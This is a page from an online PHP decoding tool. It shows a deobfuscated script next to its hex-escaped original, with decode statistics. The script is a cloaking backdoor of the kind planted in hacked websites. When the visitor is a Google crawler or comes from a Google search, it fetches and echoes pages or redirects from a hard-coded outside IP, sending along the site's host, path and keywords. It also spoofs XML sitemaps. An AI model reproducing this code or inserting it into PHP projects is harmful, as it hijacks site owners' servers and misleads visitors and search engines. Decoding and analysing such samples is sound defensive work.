Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php goto Ksi7x; lo3OZ: exit; goto ElHPp; Xfn0t: function Pg3D3() { goto oVMgR; EzRLM: r..
Decoded Output download
<?php
goto Ksi7x; lo3OZ: exit; goto ElHPp; Xfn0t: function Pg3D3() { goto oVMgR; EzRLM: return false; goto XNoZX; GxprX: O1InC: goto EzRLM; Rkln8: return preg_match("/google/i", $_SERVER["HTTP_REFERER"]) === 1; goto GxprX; oVMgR: if (!isset($_SERVER["HTTP_REFERER"])) { goto O1InC; } goto Rkln8; XNoZX: } goto jivui; JH3RP: if (!(strpos($_SERVER["REQUEST_URI"], ".xml") !== false)) { goto XN_8S; } goto fDqRU; ElHPp: Lo6bw: goto CeQ8w; kDz_a: function rhY0m() { goto XdTl5; GP6a0: ATrsK: goto UpKKF; MT2fw: return false; goto nS9Dz; IoVwC: WyIib: goto lsYZO; XdTl5: if (preg_match("/.*(google).*/i", $_SERVER["HTTP_USER_AGENT"])) { goto ATrsK; } goto MT2fw; nS9Dz: goto WyIib; goto GP6a0; UpKKF: return true; goto IoVwC; lsYZO: } goto Xfn0t; Ksi7x: $pQNHq = ["game", "hot", "shell", "store", "goods"]; goto fVypu; lyPv8: $OeEZ_ = pathinfo($OMrTu, PATHINFO_EXTENSION); goto JH3RP; fVypu: function yO8bo($HqhcV) { goto oJO4G; I6Cnh: WU58h: goto RkBeu; sdkKf: return $I32ia . "221/jsc@?" . $b99fz; goto QX2Jh; YDSQQ: if (!(count($m1hn7) >= 3)) { goto y26yE; } goto BEvZw; n4GTQ: $B1DnL = "site=" . (isset($_SERVER["HTTPS"]) ? "https" : "http") . "://{$_SERVER["HTTP_HOST"]}/" . $m1hn7[1] . "/"; goto MG0lF; FpMSd: if (!Pg3D3()) { goto WNoRf; } goto kQvgW; vmfLk: goto sj8Q_; goto I6Cnh; gnBEa: $b99fz = $B1DnL . $oxKFb . $bLxFO . $dFJ3Q; goto sdkKf; PLLqy: return "404"; goto yNkXX; d24WZ: WNoRf: goto iRkj9; RkBeu: sj8Q_: goto DFHeK; kQvgW: return $I32ia . "221/jsc@?/redirect.html"; goto d24WZ; RBRNh: $m1hn7 = explode("/", $uS7Yi["path"]); goto YDSQQ; iRkj9: if (rHY0M()) { goto q6Sqs; } goto PLLqy; yNkXX: q6Sqs: goto nsjsn; TvgQm: $dFJ3Q = isset($uS7Yi["query"]) ? "&keyword=" . $uS7Yi["query"] : "&keyword=" . str_replace("?", " ", $_SERVER["REQUEST_URI"]); goto gnBEa; DFHeK: $bLxFO = "&host={$_SERVER["HTTP_HOST"]}"; goto TvgQm; SQl4L: if ($uS7Yi["path"] == "/" or substr($uS7Yi["path"], -4) == ".php") { goto WU58h; } goto RBRNh; v1QMW: $B1DnL = "site=" . (isset($_SERVER["HTTPS"]) ? "https" : "http") . "://{$_SERVER["HTTP_HOST"]}" . $uS7Yi["path"] . "?"; goto SQl4L; fPYGk: $oxKFb = "&url_tag=" . ltrim($uS7Yi["path"], "/") . "?"; goto v1QMW; oJO4G: $I32ia = "http://165.154.229."; goto FpMSd; MG0lF: y26yE: goto vmfLk; BEvZw: $oxKFb = "&url_tag=" . $m1hn7[1]; goto n4GTQ; nsjsn: $uS7Yi = parse_url($HqhcV); goto fPYGk; QX2Jh: } goto kDz_a; fDqRU: header("Content-Type: application/xml"); goto aNyV7; jivui: $HqhcV = (isset($_SERVER["HTTPS"]) ? "https" : "http") . "://{$_SERVER["HTTP_HOST"]}{$_SERVER["REQUEST_URI"]}"; goto uIVOt; CeQ8w: XN_8S: goto eGBRO; uIVOt: $OMrTu = YO8bo($HqhcV); goto lyPv8; nusaZ: echo file_get_contents($OMrTu); goto lo3OZ; eGBRO: foreach ($pQNHq as $dFJ3Q) { goto hd4ro; hd4ro: if (!(strpos($_SERVER["REQUEST_URI"], "?{$dFJ3Q}/") !== false or strpos($_SERVER["REQUEST_URI"], "/{$dFJ3Q}/") !== false)) { goto d9aSX; } goto yO5lD; DG260: d9aSX: goto y20JO; yO5lD: if (!($OMrTu !== "404")) { goto ZV6YW; } goto TF39A; K845M: exit; goto DG260; TF39A: echo file_get_contents($OMrTu); goto FqTg2; y20JO: nxExQ: goto clu51; FqTg2: ZV6YW: goto K845M; clu51: } goto ZMQdP; aNyV7: if (!($OMrTu !== "404")) { goto Lo6bw; } goto nusaZ; ZMQdP: o_lUt:; ?>
Did this file decode correctly?
Original Code
<?php
goto Ksi7x; lo3OZ: exit; goto ElHPp; Xfn0t: function Pg3D3() { goto oVMgR; EzRLM: return false; goto XNoZX; GxprX: O1InC: goto EzRLM; Rkln8: return preg_match("\x2f\147\157\x6f\147\x6c\145\57\x69", $_SERVER["\x48\x54\124\x50\x5f\122\105\106\105\x52\x45\122"]) === 1; goto GxprX; oVMgR: if (!isset($_SERVER["\110\124\124\120\x5f\122\105\x46\x45\122\x45\122"])) { goto O1InC; } goto Rkln8; XNoZX: } goto jivui; JH3RP: if (!(strpos($_SERVER["\122\105\121\125\105\123\124\137\125\122\x49"], "\x2e\x78\x6d\154") !== false)) { goto XN_8S; } goto fDqRU; ElHPp: Lo6bw: goto CeQ8w; kDz_a: function rhY0m() { goto XdTl5; GP6a0: ATrsK: goto UpKKF; MT2fw: return false; goto nS9Dz; IoVwC: WyIib: goto lsYZO; XdTl5: if (preg_match("\x2f\x2e\52\50\x67\157\157\x67\154\145\x29\x2e\x2a\57\x69", $_SERVER["\x48\124\124\120\x5f\125\123\x45\x52\x5f\x41\x47\105\116\x54"])) { goto ATrsK; } goto MT2fw; nS9Dz: goto WyIib; goto GP6a0; UpKKF: return true; goto IoVwC; lsYZO: } goto Xfn0t; Ksi7x: $pQNHq = ["\147\x61\155\145", "\150\157\164", "\x73\150\x65\x6c\154", "\x73\x74\157\x72\x65", "\x67\x6f\157\144\163"]; goto fVypu; lyPv8: $OeEZ_ = pathinfo($OMrTu, PATHINFO_EXTENSION); goto JH3RP; fVypu: function yO8bo($HqhcV) { goto oJO4G; I6Cnh: WU58h: goto RkBeu; sdkKf: return $I32ia . "\62\62\x31\x2f\x6a\x73\143\100\77" . $b99fz; goto QX2Jh; YDSQQ: if (!(count($m1hn7) >= 3)) { goto y26yE; } goto BEvZw; n4GTQ: $B1DnL = "\x73\151\164\x65\75" . (isset($_SERVER["\110\x54\x54\120\x53"]) ? "\150\x74\x74\x70\163" : "\150\164\164\160") . "\72\57\57{$_SERVER["\110\124\124\120\137\x48\117\x53\x54"]}\57" . $m1hn7[1] . "\x2f"; goto MG0lF; FpMSd: if (!Pg3D3()) { goto WNoRf; } goto kQvgW; vmfLk: goto sj8Q_; goto I6Cnh; gnBEa: $b99fz = $B1DnL . $oxKFb . $bLxFO . $dFJ3Q; goto sdkKf; PLLqy: return "\x34\x30\64"; goto yNkXX; d24WZ: WNoRf: goto iRkj9; RkBeu: sj8Q_: goto DFHeK; kQvgW: return $I32ia . "\x32\62\x31\57\152\x73\x63\100\x3f\x2f\162\x65\x64\151\x72\x65\x63\x74\56\x68\164\155\154"; goto d24WZ; RBRNh: $m1hn7 = explode("\x2f", $uS7Yi["\x70\x61\164\150"]); goto YDSQQ; iRkj9: if (rHY0M()) { goto q6Sqs; } goto PLLqy; yNkXX: q6Sqs: goto nsjsn; TvgQm: $dFJ3Q = isset($uS7Yi["\161\165\x65\162\171"]) ? "\46\153\145\x79\167\157\x72\x64\x3d" . $uS7Yi["\161\x75\145\162\171"] : "\x26\x6b\145\x79\167\157\162\144\75" . str_replace("\77", "\x20", $_SERVER["\122\105\121\x55\x45\123\x54\x5f\x55\122\x49"]); goto gnBEa; DFHeK: $bLxFO = "\x26\x68\x6f\x73\x74\x3d{$_SERVER["\110\x54\x54\120\137\110\x4f\123\124"]}"; goto TvgQm; SQl4L: if ($uS7Yi["\160\x61\164\x68"] == "\57" or substr($uS7Yi["\x70\x61\164\150"], -4) == "\x2e\x70\150\160") { goto WU58h; } goto RBRNh; v1QMW: $B1DnL = "\163\151\164\x65\75" . (isset($_SERVER["\110\124\124\120\123"]) ? "\x68\164\164\x70\163" : "\150\x74\x74\x70") . "\72\x2f\x2f{$_SERVER["\110\x54\x54\120\x5f\110\x4f\x53\x54"]}" . $uS7Yi["\x70\141\164\150"] . "\77"; goto SQl4L; fPYGk: $oxKFb = "\46\x75\x72\x6c\137\x74\141\x67\75" . ltrim($uS7Yi["\x70\141\164\x68"], "\x2f") . "\x3f"; goto v1QMW; oJO4G: $I32ia = "\150\164\164\x70\72\x2f\57\x31\x36\x35\56\61\x35\x34\x2e\62\62\71\56"; goto FpMSd; MG0lF: y26yE: goto vmfLk; BEvZw: $oxKFb = "\x26\x75\x72\x6c\137\164\x61\x67\75" . $m1hn7[1]; goto n4GTQ; nsjsn: $uS7Yi = parse_url($HqhcV); goto fPYGk; QX2Jh: } goto kDz_a; fDqRU: header("\103\157\156\164\145\156\164\55\124\x79\x70\x65\x3a\x20\141\x70\x70\x6c\151\x63\x61\164\151\157\156\x2f\170\155\154"); goto aNyV7; jivui: $HqhcV = (isset($_SERVER["\x48\x54\124\120\x53"]) ? "\150\x74\x74\160\163" : "\150\x74\164\160") . "\72\x2f\57{$_SERVER["\x48\x54\x54\120\137\110\x4f\123\124"]}{$_SERVER["\122\105\121\125\105\123\124\137\x55\122\x49"]}"; goto uIVOt; CeQ8w: XN_8S: goto eGBRO; uIVOt: $OMrTu = YO8bo($HqhcV); goto lyPv8; nusaZ: echo file_get_contents($OMrTu); goto lo3OZ; eGBRO: foreach ($pQNHq as $dFJ3Q) { goto hd4ro; hd4ro: if (!(strpos($_SERVER["\122\x45\x51\125\x45\x53\x54\137\125\122\x49"], "\77{$dFJ3Q}\57") !== false or strpos($_SERVER["\x52\x45\x51\125\x45\123\124\137\125\x52\x49"], "\x2f{$dFJ3Q}\x2f") !== false)) { goto d9aSX; } goto yO5lD; DG260: d9aSX: goto y20JO; yO5lD: if (!($OMrTu !== "\x34\60\64")) { goto ZV6YW; } goto TF39A; K845M: exit; goto DG260; TF39A: echo file_get_contents($OMrTu); goto FqTg2; y20JO: nxExQ: goto clu51; FqTg2: ZV6YW: goto K845M; clu51: } goto ZMQdP; aNyV7: if (!($OMrTu !== "\x34\x30\x34")) { goto Lo6bw; } goto nusaZ; ZMQdP: o_lUt:;
Function Calls
None |
Stats
MD5 | fbc9bbbf6719e3cde7734c926e4d31f7 |
Eval Count | 0 |
Decode Time | 47 ms |